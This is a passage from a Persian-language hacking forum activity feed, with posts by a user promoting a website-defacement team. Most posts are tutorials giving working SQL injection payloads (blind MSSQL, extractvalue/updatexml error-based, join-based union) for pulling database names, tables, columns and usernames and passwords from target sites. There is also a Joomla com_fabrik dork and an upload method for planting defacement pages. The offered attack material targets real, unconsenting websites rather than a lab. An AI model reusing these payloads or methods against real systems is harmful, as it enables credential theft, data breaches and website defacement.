-
ارسال ها
484 -
تاریخ عضویت
-
آخرین بازدید
-
روز های برد
46
فعالیت های امتیازی
-
MR.MSA از johnjones یک واکنش گرفت در استفاده از آسیب پذیری sql injection در صفحه ادمین
سلام چرا راه های دیگه هم هست توی نت سرچ کنید .
و اینکه ممکن هست باگ رو نداشته باشه همه جا که کار نمی کنه .
-
MR.MSA از johnjones یک واکنش گرفت در استفاده از آسیب پذیری sql injection در صفحه ادمین
اون تگ کتیشن برا یه موقع دیگس
من خودم حرفه ای sql injection رو کار کردم .
و اینکه یه سایت ممکنه تو پارامتر دهی باگ داشته باشه اما دلیل نمیشه صفحه ادمین هم باگ داشته باشه .
-
MR.MSA از johnjones یک واکنش گرفت در استفاده از آسیب پذیری sql injection در صفحه ادمین
sql injection اصلش برای زمانی هست که پارامتر دهی انجام می شود .
تو این تاپیک می توانید ویدئو ها رو مشاهده کنید تا بهتر متوجه شوید .
-
MR.MSA از johnjones یک واکنش گرفت در استفاده از آسیب پذیری sql injection در صفحه ادمین
خواهش میکنم .
در ضمن می توانید برای یادگیری و یا عضویت در تیم دیفیس به سرور دیسکورد گاردایران بپیوندید .
و برای تشکر از دکمه کنار تاپیک ها استفاده کنید !
این بهترین تشکری که می تونید انجام بدید . (تاپیک هایی که مورد پسند بودن !)
-
MR.MSA از johnjones یک واکنش گرفت در آموزش کامل الکترونیک
با سلام خدمت شما
برای اینجور مسائل تاپیک ها بسته نمیشه و از این نظر نگران نباشید .
ممنون از فعالیت شما ، موفق و پیروز باشید.
-
MR.MSA از johnjones یک واکنش گرفت در متد blind در سایت های asp
با سلام خدمت شما کاربران و مدیران عزیز گارد ایران
در این پست می خواهم به شما متد قدرتمند blind را در سایت های asp آموزش بدهم .
Blind to asp
تست اسیب پذیری :
and 1=1 باید لود شود و and 1=2 نباید لود شود .
نام دیتابیس
با دستور :
and isnull (ascii(substring (cast((select lower(db_name(0)))as varchar(8000)),1,1)),0)>97
97 که با کد ascii می شود a
و داریم می گوییم حرف اول نام دیتابیس a است و اگر صفحه لود شد یعنی حرف اول a نیست و 97 مثلا می شود 98 یعنی b و به همین صورت پیش می روید
یکی یکی تا اینکه به یک عدد برسید که صفحه لود نشود و ان اولین حرف نام دیتابیس هست و بیشتر کار ها هم مثل blind در mysql است و برای مثلا انجام دادن
همین کار برای حرف دوم نام دیتابیس ان عدد را که در دستور بالا قرمز کردیم را مثلا کنید ۲ و برای حرف ۳ بکنید ۳ و به همین صورت .
ببخشید که یک کمی طولانی شد .
--------- --------- --------- --------- --------- --------- --------- --------- --------- ---------
نکته :
اگر یک زمان نتیجه این طور شد : (مثلا برای حرف ۲)
99 < true
100 > true
99 = false
یعنی بیشتر از ۹۹ و کمتر از ۱۰۰ و ۹۹ هم نیست پس بین این ها ۹۹.۵ است که تخمین زده می شود به ۱۰۰ به این صورت :
This is the hidden content, please ورود یا ثبت نام --------- --------- --------- --------- --------- --------- --------- --------- --------- ---------
بیرون کشیدن نام دیتابیس های بعدی :
and isnull (ascii(substring(cast((select lower (db_name(0))) as varcher (8000)),1,1)),0)>97
برای اینکار ان عدد 0 را که آبی هست یکی یکی اضافه کنید تا یکی یکی بروید به دیتابیس بعد .
مثال :
and isnull (ascii(substring(cast((select lower (db_name(1))) as varcher (8000)),6,1)),0)>97
and isnull (ascii(substring(cast((select lower (db_name(2))) as varcher (8000)),4,1)),0)>98
and isnull (ascii(substring(cast((select lower (db_name(3))) as varcher (8000)),3,1)),0)>102
and isnull (ascii(substring(cast((select lower (db_name(4))) as varcher (8000)),1,1)),0)>107
--------- --------- --------- --------- --------- --------- --------- --------- --------- ---------
چون متد پیچیده ای هست و برای اینکه پست طولانی نشود در آموزش بعد به شما بیرون کشیدن تیبل ها را آموزش می دهم .
-
MR.MSA از johnjones یک واکنش گرفت در متد blind در سایت های asp
با سلام خدمت دوستان عزیز در این پست همانطور که گفتم قرار است بیرون کشیدن تیبل ها را به شما آموزش دهم .
بیرون کشیدن تیبل ها :
and isnull (ascii(substring(cast((select top 1 lower (name) from sysobjects where xtype=0x55 and name not in (select top 1 lower (name) from sysobjects where xtype=0x55))as varcher (8000)),1,1)),0)>97
برای حرف دوم ، عدد بنفش را یکی یکی اضافه کنید
و بقیه چیز ها هم مثل blind معمولی است و اینکه مثلا شما امدید و تمام حرف های تیبل اول را بدست اوردید اما بدرد شما نخورد برای اینکه بروید تیبل دوم
ان عدد بعد از top (که ابی و بولد است) را یکی یکی اضافه کنید .
در پست بعد به شما آموزش بیرون کشیدن ستون ها رو میدم .
دوستانی که متد blind در سایت های php بلد نیستند و یا دوست دارند تا من آموزش متد blind در سایت های php را بزارم از این پست حمایت کنند .
-
MR.MSA از johnjones یک واکنش گرفت در متد blind در سایت های asp
همانطور که گفتم در در این پست قصد دارم آموزش بیرون کشیدن ستون ها رو بدم .
بیرون کشیدن ستون های یک جدول :
and isnull (ascii(substring(cast((select p.name from(select (select count (i.colid)rid from syscolumns i where (i.colid<=o.colid)and id=(select id from sysobjects where name=’X’ ))x,name from syscolumns o where id=(select id from sysobject where name=’X’))p where(p.x=1)) as varcher (8000)),1,1)),0)>97
در دو قسمتی که این X قرار داشت نام تیبل مهم را بنویسید و عدد ۹۷ که ابی هست یعنی نشان دهنده حروف در ستون ها می تواند کمتر ش هم کنید ( یعنی می تواند حروف بزرگ هم باشد. )
و عدد بنفش هم برای رفتن به کاراکتر بعدی هست و برای اینکه بروید ستون بعد ان عدد ۱ که بولد و سبز است را زیاد می کنید و بقیه مراحل هم مثل روش های قبل .
امیدوارم از این پست لذت برده باشید و در پست بعد آموزش بیرون کشیدن اطلاعات ستون ها بهتون میدم .
خوش باشید .
-
MR.MSA از johnjones یک واکنش گرفت در متد blind در سایت های asp
بیرون کشیدن اطلاعات ستون های یک جدول :
and ascii(substring(select column from table where masir),1,1))>97
به جای column نام ستون مورد نظر را بنویسید و به جای table نام تیبل مهم را بنویسید و به جای masir چیز های متد GET ( به غییر از چیز هایی که خودمان نوشته ایم )یعنی مثلا id=1 و بقیه مراحل هم به همین صورت برای بیرو کشیدن حرف اول همان عدد 97 را تغییر و برای رفتن به کاراکتر بعدی همان عدد 1 همیشگی .
امیدوارم لذت برده باشید ، ببخشید که یک زره پست بخش بخش شد در پست های بعد این مشکل رو حل می کنم.
-
MR.MSA از sajad325 یک واکنش گرفت در اسیب پذیری Xpath Injection
با سلام خدمت دوستان عزیز در این تاپیک قصد دارم به شما متد Xpath رو آموزش بدهم .
Xpath injection
کاربرد :
1. مثلا زمانی که در دستور +order+by+99999-- عدد 1 هم که می زنید صفحه لود نمی شود باید از این متد استفاده کنید .
2. زمانی که به ارورnumber of column the diffrent باید از این متد استفاده کنید .
3. زمانی که union…. را می زنید و با وجود اینکه تعداد درست است ولی به شما ستون اسیب پذیر را نشان ندهد .
4. و.....
-------------- -------------- --------------
روش استفاده از متد xpath
اول از بایپس هایی که بلدید استفاده کنید مثل : منفی پشت عدد ، source ، بزرگ کردن حروف و ....
اگر مشکل حل نشد به سراغ این متد میاید .
آموزش متد xpath :
بدست اوردن ورژن :
This is the hidden content, please ورود یا ثبت نام
0x7e به معنای علامت (~) است .
version() به معنای ورژن سایت است.
در آموزش بعدی به شما بیرون کشیدن تیبل ها را آموزش می دهم .
-
MR.MSA از johnjones یک واکنش گرفت در اسیب پذیری Xpath Injection
خب همانطور که گفتم در این آموزش قرار است به شما بیرون کشیدن تیبل ها را در متد Xpath آموزش دهم.
بدست اوردن تیبل ها :
This is the hidden content, please ورود یا ثبت نام select : برای نمایش ،
table_name : نام تیبل ،
: from+information_schema.tables در تیبل های این قسمت ،
limit 0,1 برای شمردن تیبل ها .
برای شمردن یکی یکی عدد limit (توجه ولیوی اول یعنی 0) را زیاد کنید .
و اینکه 0 که گذاشتیم خودش معنای ۱ را می دهد .
برای محدود کردن تیبل ها که تیبل های پیش فرض را نشان ندهد :
This is the hidden content, please ورود یا ثبت نام و مثل بالا یکی یکی limit را اضافه می کنید .
. در آموزش بعدی به شما بیرون کشیدن ستون ها را آموزش می دهم
. دوستان توجه داشته باشند که من فایل ورد متد ها رو دارم و هر که نیاز داشت به من پیام بدهد
-
MR.MSA از johnjones یک واکنش گرفت در اسیب پذیری Xpath Injection
بیرون کشیدن ستون ها :
…..?sa=12+and+extractvalue(rand(),concat(0x7e,(select+column_name+from+information_schema.columns+where+table_name={hex = table name mohem}+limit+0,1)))--
به جای هکز مساوی با تیبل نیم مهم نام تیبل را به صورت هکز بنویسید . (با 0x )
و برای اینکه تمام ستون ها را بیرون بکشید باید یکی یکی عدد limit را زیاد کنید .
-----------------
مثال :
ستون اول =
…..?sa=12+and+extractvalue(rand(),concat(0x7e,(select+column_name+from+information_schema.columns+where+table_name={hex = table name mohem}+limit+0,1)))--
ستون دوم =
…..?sa=12+and+extractvalue(rand(),concat(0x7e,(select+column_name+from+information_schema.columns+where+table_name={hex = table name mohem}+limit+1,1)))--
ستون سوم =
…..?sa=12+and+extractvalue(rand(),concat(0x7e,(select+column_name+from+information_schema.columns+where+table_name={hex = table name mohem}+limit+2,1)))--
و....
----------- ----------- ----------- -----------
بیرون کشیدن username و password :
This is the hidden content, please ورود یا ثبت نام
در قسمت تیبل نیم مهم نام تیبل مهم خود را بدون هکز کردن بنویسید .
----------------------------------------------------------------------------------------------------------------
نکته : اگر یک زمان سایت به extractvalue حساس بود یا به هر ارور دریافت کردید می توانید از جاگزین ان استفاده کنید یعنی :
updatexml
برا اینکه بفهمید بر روی سایت updatexml کار می کند باید اول این دستور را بزنید :
This is the hidden content, please ورود یا ثبت نام
و اگر خطایی دریافت کردید مثل :
This is the hidden content, please ورود یا ثبت نام یعنی سایت به updatexml حساس نیست .
و اولین دستور برای بدست اوردن ورژن :
This is the hidden content, please ورود یا ثبت نام
و بیرون کشیدن تیبل ها و محدود سازی دیتابیس :
This is the hidden content, please ورود یا ثبت نام
برای نشان دادن تیبل های بعدی ولیوی اول limit را اضافه کنید . (توجه داشته باشید که خود صفر تیبل اول است )
بیرون کشیدن ستون ها :
This is the hidden content, please ورود یا ثبت نام
و برای نشان دادن ستون مهم لیمیت را یکی یکی اضافه کنید و به جای {hex = table name mohem} هکز شده ی تیبل مهم خود را بگذارید .
بیرون کشیدن password و username :
This is the hidden content, please ورود یا ثبت نام
به جای تیبل نیم نام تیبل را بنویسید بدون هکز کردن و به جای یوزرنیم و پسورد نام دو ستون مهم را بنویسید و یکی یکی لیمیت را زیاد کنید تا یوزر و پسورد بعدی را نمایش دهد.
امیدوارم لذت برده باشید و سعی کردم بیشتر توضیحات رو بدم و پست چند بخشی نشود .
-
MR.MSA از johnjones یک واکنش گرفت در متد Fabrik
Fabrik
موارد قابل استفاده :
در سایت های جوملا قابل استفاده است .
یکی از زیر مجموعه های RFI
در سایت هایی که این ادرس را دارند (دورک): index.php?option=com_fabrik
....و
Dork : inurl:index.php?option=com_fabrik
مراحل متد :
۱ ) دورک را بزنید و یک سایت را انتخاب کنید و اگر صفحه بدون خطای ۴۰۴ ، ۴۰۱ و ۵۰۰ لود شد یعنی به احتمال زیاد این باگ را دارد . (مطمئن شوید که سایت با cms جوملا هست )
۲) این اکسپلویت را به ادرس سایت اضافه کنید .
This is the hidden content, please ورود یا ثبت نام
۳) سپس فایل خود را آپلود کنید .( اون فایل می توانید دیفیس پیج شما باشد . )
۴) این ادرس را به سایت اضافه و به جای (FILE_NAME) نام فایل خودتان را بنویسید .
This is the hidden content, please ورود یا ثبت نام
-
MR.MSA از johnjones یک واکنش گرفت در متد Having
بایپس نشان ندادن ستون آسیب پذیر
اگر بایپس هایی مثل null کردن را انجام دادید و نتیجه نداد باید از Having استفاده کنید .
نوع having ها :
Having null
Having false
Having 0
Having 1 like 0
Having 1 limit 0
به این صورت :
This is the hidden content, please ورود یا ثبت نام
در جایی که نوشته شده <having> باید نوع having را بنویسید .
مثال :
This is the hidden content, please ورود یا ثبت نام
تمام having ها را انجام دهید تا به نتیجه برسید .
امیدوارم لذت برده باشید .
💙 فراموش نشه 😍
-
MR.MSA از johnjones یک واکنش گرفت در متد separator در sql injection
با سلام خدمت دوستان و مدیران عزیز سایت GUARDIRAN
در این پست قصد دارم به شما آموزش متد separator رو یدم ، در آموزش متد join اگر یادتون باشه نامی از متد separator رو بردم امروز گفتم شاید مبدتی ها با این متد آشنایی نباشند و آموزشش رو بدم .
متد separator :
در زمان مرتب سازی تیبل ها ، ستون ها و یوزرنیم و پسورد ها شما میاید از کاما برای گذاشتن تگ br (به صورت hex) استفاده می کنید :
..........(group_concat(table_name,0x3c62723e......
حالا شاید در بعضی تارگت ها سایت به کاما حساس باشد در اینجا است که باید از متد separator استفاده کنید ، به این صورت :
.......( group_concat((table_name)separator 0x3c62723e......
زیاد پست رو طولانی نمی کنم و گفتم متد ساده ای هست نیاز به توضیحات ندارد .
ممنون که وقت گذاشتید و این تاپیک رو تا آخر خواندید .
-
MR.MSA از johnjones یک واکنش گرفت در دانلود نسخه های 2018 و 2019 کالی لینوکس
برای دانلود نسخه های ۲۰۱۸ و ۲۰۱۹ به لینک های زیر مراجعه کنید :
دانلود کالی لینوکس نسخه ۲۰۱۸.۱
This is the hidden content, please ورود یا ثبت نام 2.8G This is the hidden content, please ورود یا ثبت نام 2.9G This is the hidden content, please ورود یا ثبت نام 2.6G This is the hidden content, please ورود یا ثبت نام 2.9G This is the hidden content, please ورود یا ثبت نام 846M This is the hidden content, please ورود یا ثبت نام 479M This is the hidden content, please ورود یا ثبت نام 589M This is the hidden content, please ورود یا ثبت نام 846M This is the hidden content, please ورود یا ثبت نام 2.6G This is the hidden content, please ورود یا ثبت نام 2.7G This is the hidden content, please ورود یا ثبت نام 2.6G دانلود کالی لینوکس نسخه ۲۰۱۸.۲
This is the hidden content, please ورود یا ثبت نام 2.7G This is the hidden content, please ورود یا ثبت نام 2.8G This is the hidden content, please ورود یا ثبت نام 2.5G This is the hidden content, please ورود یا ثبت نام 2.8G This is the hidden content, please ورود یا ثبت نام 865M This is the hidden content, please ورود یا ثبت نام 642M This is the hidden content, please ورود یا ثبت نام 864M This is the hidden content, please ورود یا ثبت نام 2.6G This is the hidden content, please ورود یا ثبت نام 2.7G This is the hidden content, please ورود یا ثبت نام 2.6G دانلود کالی لینوکس نسخه ۲۰۱۸.۳
This is the hidden content, please ورود یا ثبت نام 3.0G This is the hidden content, please ورود یا ثبت نام 3.1G This is the hidden content, please ورود یا ثبت نام 2.8G This is the hidden content, please ورود یا ثبت نام 3.0G This is the hidden content, please ورود یا ثبت نام 854M This is the hidden content, please ورود یا ثبت نام 639M This is the hidden content, please ورود یا ثبت نام 851M This is the hidden content, please ورود یا ثبت نام 2.8G This is the hidden content, please ورود یا ثبت نام 2.9G This is the hidden content, please ورود یا ثبت نام 2.8G دانلود کالی لینوکس نسخه ۲۰۱۸.۴
This is the hidden content, please ورود یا ثبت نام 2.9G This is the hidden content, please ورود یا ثبت نام 3.0G This is the hidden content, please ورود یا ثبت نام 2.7G This is the hidden content, please ورود یا ثبت نام 3.0G This is the hidden content, please ورود یا ثبت نام 867M This is the hidden content, please ورود یا ثبت نام 629M This is the hidden content, please ورود یا ثبت نام 863M This is the hidden content, please ورود یا ثبت نام 2.7G This is the hidden content, please ورود یا ثبت نام 2.9G This is the hidden content, please ورود یا ثبت نام 2.7G دانلود کالی لینوکس نسخه ۲۰۱۹.۱
This is the hidden content, please ورود یا ثبت نام 3.2G This is the hidden content, please ورود یا ثبت نام 3.3G This is the hidden content, please ورود یا ثبت نام 3.0G This is the hidden content, please ورود یا ثبت نام 3.5G This is the hidden content, please ورود یا ثبت نام 931M This is the hidden content, please ورود یا ثبت نام 682M This is the hidden content, please ورود یا ثبت نام 929M This is the hidden content, please ورود یا ثبت نام 3.0G This is the hidden content, please ورود یا ثبت نام 3.1G This is the hidden content, please ورود یا ثبت نام 3.0G دانلود کالی لینوکس نسخه ۲۰۱۹.۱a
This is the hidden content, please ورود یا ثبت نام 3.2G This is the hidden content, please ورود یا ثبت نام 3.4G This is the hidden content, please ورود یا ثبت نام 3.1G This is the hidden content, please ورود یا ثبت نام 3.5G This is the hidden content, please ورود یا ثبت نام 1.0G This is the hidden content, please ورود یا ثبت نام 693M This is the hidden content, please ورود یا ثبت نام 1.0G This is the hidden content, please ورود یا ثبت نام 3.0G This is the hidden content, please ورود یا ثبت نام 3.2G This is the hidden content, please ورود یا ثبت نام 3.1G دانلود کالی لینوکس نسخه ۲۰۱۹.۲
This is the hidden content, please ورود یا ثبت نام 3.1G This is the hidden content, please ورود یا ثبت نام 3.2G This is the hidden content, please ورود یا ثبت نام 3.0G This is the hidden content, please ورود یا ثبت نام 3.4G This is the hidden content, please ورود یا ثبت نام 951M This is the hidden content, please ورود یا ثبت نام 741M This is the hidden content, please ورود یا ثبت نام 949M This is the hidden content, please ورود یا ثبت نام 2.9G This is the hidden content, please ورود یا ثبت نام 3.1G This is the hidden content, please ورود یا ثبت نام 3.0G دانلود کالی لینوکس نسخه ۲۰۱۹.۳
This is the hidden content, please ورود یا ثبت نام 2.8G This is the hidden content, please ورود یا ثبت نام 2.8G This is the hidden content, please ورود یا ثبت نام 2.7G This is the hidden content, please ورود یا ثبت نام 3.2G This is the hidden content, please ورود یا ثبت نام 3.5G This is the hidden content, please ورود یا ثبت نام 1.0G This is the hidden content, please ورود یا ثبت نام 802M This is the hidden content, please ورود یا ثبت نام 1.0G This is the hidden content, please ورود یا ثبت نام 2.6G This is the hidden content, please ورود یا ثبت نام 2.8G This is the hidden content, please ورود یا ثبت نام 2.7G دانلود کالی لینوکس نسخه ۲۰۱۹.۴
This is the hidden content, please ورود یا ثبت نام 2.6G This is the hidden content, please ورود یا ثبت نام 2.7G This is the hidden content, please ورود یا ثبت نام 2.6G This is the hidden content, please ورود یا ثبت نام 3.1G This is the hidden content, please ورود یا ثبت نام 1.1G This is the hidden content, please ورود یا ثبت نام 792M This is the hidden content, please ورود یا ثبت نام 1.1G This is the hidden content, please ورود یا ثبت نام 2.5G This is the hidden content, please ورود یا ثبت نام 2.7G ----------------------------------------------------------------------------
امیدوارم پست خوبی رو گذاشته باشم و لذت کافی رو برده باشید .
سعی کردم بیشتر نسخه ها رو بزارم و اینکه تمام نسخه ها از سایت کالی لینوکس است .
********** MR.MSA ***********
< آموزش متد join در sql injection >
<دانلود نسخه های ۱ تا ۲ کالی لینوکس >
<دانلود نسخه های ۲۰۱۶ و ۲۰۱۷ کالی لینوکس>
-
MR.MSA از johnjones یک واکنش گرفت در دانلود نسخه های ۱ تا ۲ کالی لینوکس
برای دانلود نسخه های کالی لینوکس ۱ تا ۲ به لینک های زیر مراجعه کنید :
دانلود کالی لینوکس نسخه ۱.۰.۰
This is the hidden content, please ورود یا ثبت نام 2.0G This is the hidden content, please ورود یا ثبت نام 386M This is the hidden content, please ورود یا ثبت نام 413M دانلود کالی لینوکس نسخه ۱.۰.۲
2.2G
This is the hidden content, please ورود یا ثبت نام 2.3G kali-linux-1.0.2-i386.iso دانلود کالی لینوکس نسخه ۱.۰.۳
2.3G This is the hidden content, please ورود یا ثبت نام This is the hidden content, please ورود یا ثبت نام 2.2G دانلود کالی لینوکس نسخه ۱.۰.۴
2.3G
This is the hidden content, please ورود یا ثبت نام 2.0G
This is the hidden content, please ورود یا ثبت نام 2.4G
This is the hidden content, please ورود یا ثبت نام 1.8G
This is the hidden content, please ورود یا ثبت نام دانلود کالی لینوکس نسخه ۱.۰.۵
1.5G
This is the hidden content, please ورود یا ثبت نام 2.4G
This is the hidden content, please ورود یا ثبت نام 1.4G This is the hidden content, please ورود یا ثبت نام
2.4G This is the hidden content, please ورود یا ثبت نام
دانلود کالی لینوکس نسخه ۱.۰.۶
2.9G This is the hidden content, please ورود یا ثبت نام
2.0G This is the hidden content, please ورود یا ثبت نام
1.9G This is the hidden content, please ورود یا ثبت نام
3.0G This is the hidden content, please ورود یا ثبت نام
دانلود کالی لینوکس نسخه ۱.۰.۷
2.8G This is the hidden content, please ورود یا ثبت نام
2.1G This is the hidden content, please ورود یا ثبت نام
2.0G This is the hidden content, please ورود یا ثبت نام
2.9G This is the hidden content, please ورود یا ثبت نام
دانلود کالی لینوکس نسخه ۱.۰.۸
2.9G This is the hidden content, please ورود یا ثبت نام
2.1G This is the hidden content, please ورود یا ثبت نام
2.0G This is the hidden content, please ورود یا ثبت نام
3.0G This is the hidden content, please ورود یا ثبت نام
دانلود کالی لینوکس نسخه ۱.۰.۹
2.8G This is the hidden content, please ورود یا ثبت نام
1.9G This is the hidden content, please ورود یا ثبت نام
1.9G This is the hidden content, please ورود یا ثبت نام
2.9G This is the hidden content, please ورود یا ثبت نام
دانلود کالی لینوکس نسخه ۱.۰.۹a
2.8G This is the hidden content, please ورود یا ثبت نام
2.0G This is the hidden content, please ورود یا ثبت نام
1.9G This is the hidden content, please ورود یا ثبت نام
2.9G This is the hidden content, please ورود یا ثبت نام
دانلود کالی لینوکس نسخه ۱.۱.۰
2.8G This is the hidden content, please ورود یا ثبت نام
1.9G kali-linux-1.1.0-armhf.img.xz
2.9G This is the hidden content, please ورود یا ثبت نام
2.0G
This is the hidden content, please ورود یا ثبت نام دانلود کالی لینوکس نسخه ۱.۱.۰a
2.9G This is the hidden content, please ورود یا ثبت نام
2.0G This is the hidden content, please ورود یا ثبت نام
2.0G This is the hidden content, please ورود یا ثبت نام
3.0G This is the hidden content, please ورود یا ثبت نام
دانلود کالی لینوکس نسخه ۲.۰.۰
3.1G This is the hidden content, please ورود یا ثبت نام
3.2G This is the hidden content, please ورود یا ثبت نام
864M This is the hidden content, please ورود یا ثبت نام
624M This is the hidden content, please ورود یا ثبت نام 587M This is the hidden content, please ورود یا ثبت نام
917M This is the hidden content, please ورود یا ثبت نام
----------------------------------------------------------------------------
امیدوارم پست خوبی رو گذاشته باشم و سعی کردم بیشتر نسخه ها رو بزارم .
********* MR.MSA **********
< آموزش متد join در sql injection >
-
MR.MSA از johnjones یک واکنش گرفت در دانلود نسخه های 2016 و 2017 کالی لینوکس
برای دانلود نسخه های کالی لینوکس ۲۰۱۶ و ۲۰۱۷ به لینک های زیر مراجعه کنید :
دانلود کالی لینوکس نسخه ۲۰۱۶.۱
This is the hidden content, please ورود یا ثبت نام 2.7G This is the hidden content, please ورود یا ثبت نام 2.8G This is the hidden content, please ورود یا ثبت نام 1.0G This is the hidden content, please ورود یا ثبت نام 705M This is the hidden content, please ورود یا ثبت نام 670M This is the hidden content, please ورود یا ثبت نام 1.0G دانلود کالی لینوکس نسخه ۲۰۱۶.۲
This is the hidden content, please ورود یا ثبت نام 2.9G This is the hidden content, please ورود یا ثبت نام 2.9G This is the hidden content, please ورود یا ثبت نام 2.7G This is the hidden content, please ورود یا ثبت نام 1.1G This is the hidden content, please ورود یا ثبت نام 671M This is the hidden content, please ورود یا ثبت نام 713M This is the hidden content, please ورود یا ثبت نام 1.1G This is the hidden content, please ورود یا ثبت نام 2.7G This is the hidden content, please ورود یا ثبت نام 2.8G This is the hidden content, please ورود یا ثبت نام 2.7G دانلود کالی لینوکس نسخه ۲۰۱۷.۱
This is the hidden content, please ورود یا ثبت نام 2.6G This is the hidden content, please ورود یا ثبت نام 2.7G This is the hidden content, please ورود یا ثبت نام 2.4G This is the hidden content, please ورود یا ثبت نام 2.7G This is the hidden content, please ورود یا ثبت نام 816M This is the hidden content, please ورود یا ثبت نام 472M This is the hidden content, please ورود یا ثبت نام 585M This is the hidden content, please ورود یا ثبت نام 833M This is the hidden content, please ورود یا ثبت نام 2.5G This is the hidden content, please ورود یا ثبت نام 2.6G This is the hidden content, please ورود یا ثبت نام 2.5G دانلود کالی لینوکس نسخه ۲۰۱۷.۲
This is the hidden content, please ورود یا ثبت نام 2.8G This is the hidden content, please ورود یا ثبت نام 2.9G This is the hidden content, please ورود یا ثبت نام 2.6G This is the hidden content, please ورود یا ثبت نام 2.9G This is the hidden content, please ورود یا ثبت نام 858M This is the hidden content, please ورود یا ثبت نام 484M This is the hidden content, please ورود یا ثبت نام 601M This is the hidden content, please ورود یا ثبت نام 871M This is the hidden content, please ورود یا ثبت نام 2.7G This is the hidden content, please ورود یا ثبت نام 2.8G This is the hidden content, please ورود یا ثبت نام 2.7G دانلود کالی لینوکس نسخه ۲۰۱۷.۳
This is the hidden content, please ورود یا ثبت نام 2.7G This is the hidden content, please ورود یا ثبت نام 2.7G This is the hidden content, please ورود یا ثبت نام 2.5G This is the hidden content, please ورود یا ثبت نام 2.7G This is the hidden content, please ورود یا ثبت نام 823M This is the hidden content, please ورود یا ثبت نام 477M This is the hidden content, please ورود یا ثبت نام 583M This is the hidden content, please ورود یا ثبت نام 838M This is the hidden content, please ورود یا ثبت نام 2.5G This is the hidden content, please ورود یا ثبت نام 2.6G This is the hidden content, please ورود یا ثبت نام 2.5G
----------------------------------------------------------------------------
امیدوارم پست خوبی رو گذاشته باشم و لذت کافی رو برده باشید .
سعی کردم بیشتر نسخه ها رو بزارم و اینکه تمام نسخه ها از سایت کالی لینوکس است .
********* MR.MSA **********
< آموزش متد join در sql injection >
<دانلود نسخه های ۱ تا ۲ کالی لینوکس >
-
MR.MSA از johnjones یک واکنش گرفت در نکته مهم در متد join
با سلام همانطور که در آموزش متد join در sql injection گفتم چند نکته در رابطه با متد join هست که باید بگویم که در این پست قرار است این نکات رو شرح بدم .
در بعضی از تارگت ها ممکن است زمان محدود سازی سایت به = حساس باشد :
union+select+*from+(select 1)a+join+(select+group_concat((table_name)+separator+0x3c62723e)+from+information_schema.tables+where+table_schema=database)b+join+(select 3)c+join+(select 4)d+join+(select 5)e%23+
پس شما باید از این دستور استفاده کنید :
site.com/news.php?id=3+union+select+*from (select 1)a+join+(select+group_concat(table_name)+from+information_schema.tables+where+table_schema+like+’dbname’)b+join+(select 3)c+join+(select 4)d+join+(select 5)e%23
به جای dbname نام دیتابیس مورد نظر را بزنید (در بین دو کتیشن ) و اگر با مشکل مواجه شدید دو کتیشن را حذف کنید و نام دیتابیس را بصورت hex بنویسید .
------------------------------
برای بدست آوردن نام دیتابیس در متد join از این دستور استفاده کنید :
site.com/news.php?id=3+union+select+*from (select 1)a+join+(select+database())b+join+(select 3)c+join+(select 4)d+join+(select 5)e%23
------------------------------
امید وارم از این پست لذت کافی رو برده باشید و پست رو به خوبی تمام کرده باشم و متد join رو به خوبی یاد گرفته باشید .
هر گونه سوال در مورد پست داشتید در قسمت پرسش و پاسخ بپرسید .
************ MR.MSA ************
<آموزش متد polygon در sql injection >
< آموزش متد join در sql injection >
<دانلود نسخه های ۲۰۱۸ و ۲۰۱۹ کالی لینوکس>
<دانلود نسخه های ۲۰۱۶ و ۲۰۱۷ کالی لینوکس>
<دانلود نسخه های ۱ تا ۲ کالی لینوکس >
-
MR.MSA از johnjones یک واکنش گرفت در متد join در sql injection
با سلام خدمت شما کاربران عزیز انجمن گارد ایران
در این پست می خواهم متد join رو در باگ sql injection به شما آموزش بدهم .
------------------------
موارد قابل استفاده :
۱- مواجه شدن با خطا زمان استفاده از union select
۲- مواجه شدن با خطای : 'Unknown column ‘activo’ in ‘field list
۳- زمانی که سایت به عدد حساس است .
۴- و....
------------------------
نکته : در بیشتر سایت هایی که از متد join استفاده می شود سایت به + و یا به فاصله حساس است و شما به جای فاصله باید از
/**/
استفاده کنید که من برای راحتی شما عزیزان فایلی را قرار دادم که در متد join به جای فاصله ها از /**/ استفاده شده .
------------------------
نحوه استفاده از متد join :
----------------------------------------
( برای مثال تعداد تیبل های سایت ۵ تا می باشد. )
مرحله اول بیرون کشیدن ستون آسیب پذیر :
+union+select+*from (select 1)a join (select 2)b join (select 3)c join (select 4)d join (select 5)e%23+
و همینطور تا اخر یعنی a و b و c باید کنار ( مقدار select ) قرار داشته باشند و مثلا ۱ می شود a و ۲ می شود b و به همین صورت و بین هر کدام یک join زمانی که به اخر رسدید دیگه join نمی خواهد و اینکه در اول باید بنویسید : from *
توجه داشته باشید که هر عدد تبدیل شده است به یک سلکت (مقدار عدد ) ، یک حرف و join
----------------------------------------
( برای مثال در خروجی ستون ۲ را نشان می دهد و ستون ۲ آسیب پذیر است. )
مرحله دوم بدست آوردن ورژن :
+union+select+*from (select 1)a+join+(select version())b+join+(select 3)c+join+(select 4)d+join+(select 5)e%23
----------------------------------------
مرحله سوم بیرون کشیدن جدول (table) های دیتابیس (و محدود سازی تیبل ها برای نشان ندادن تیبل های سیستمی ) :
union+select+*from+(select 1)a+join+(select+group_concat((table_name)+separator+0x3c62723e)+from+information_schema.tables+where+table_schema=database)b+join+(select 3)c+join+(select 4)d+join+(select 5)e%23+
توجه داشته باشید در بیشتر سایت ها سایت به , حساس است به همین دلیل ما از متد separator برای مرتب سازی تیبل ها و تگ <br> استفاده کردیم
و شما در صورت لزوم می توانید آن بخش هایی که بکگراند سفید دارند را حذف کنید .
----------------------------------------
( برای مثال در بین تیبل ها تیبل msa_users وجود دارد . )
مرحله چهارم بیرون کشیدن ستون های یک تیبل :
union+select+*from+(select 1)a+join+(select+group_concat(column_name)+from+information_schema.columns+where+table_name+like+'msa_users')b+join+(select 3)c+join+(select 4)d+join+(select 5)e%23+
به جای msa_users نام تیبل مهم خود را بنویسید و می توانید برای مرتب سازی ستون ها از متد separator مانند مرحله سوم استفاده کنید .
ما از متد like هم استفاده کردیم و اینکه توجه داشته باشید که بیشتر مراحل مثل یونیم بیس هست .
----------------------------------------
( برای مثال در خروجی ستون های user و pass مهم است . )
مرحله پنجم بیرون کشیدن اطلاعات در ستون های یک تیبل :
union+select+*from+(select 1)a+join+(select+group_concat(user using ascii)+from+'msa_users')b+join+(select 3)c+join+(select 4)d+join+(select 5)e%23+
به جای msa_users نام تیبل مهم خود را بنویسید و به جای user نام ستون مهم خود را بنویسید.
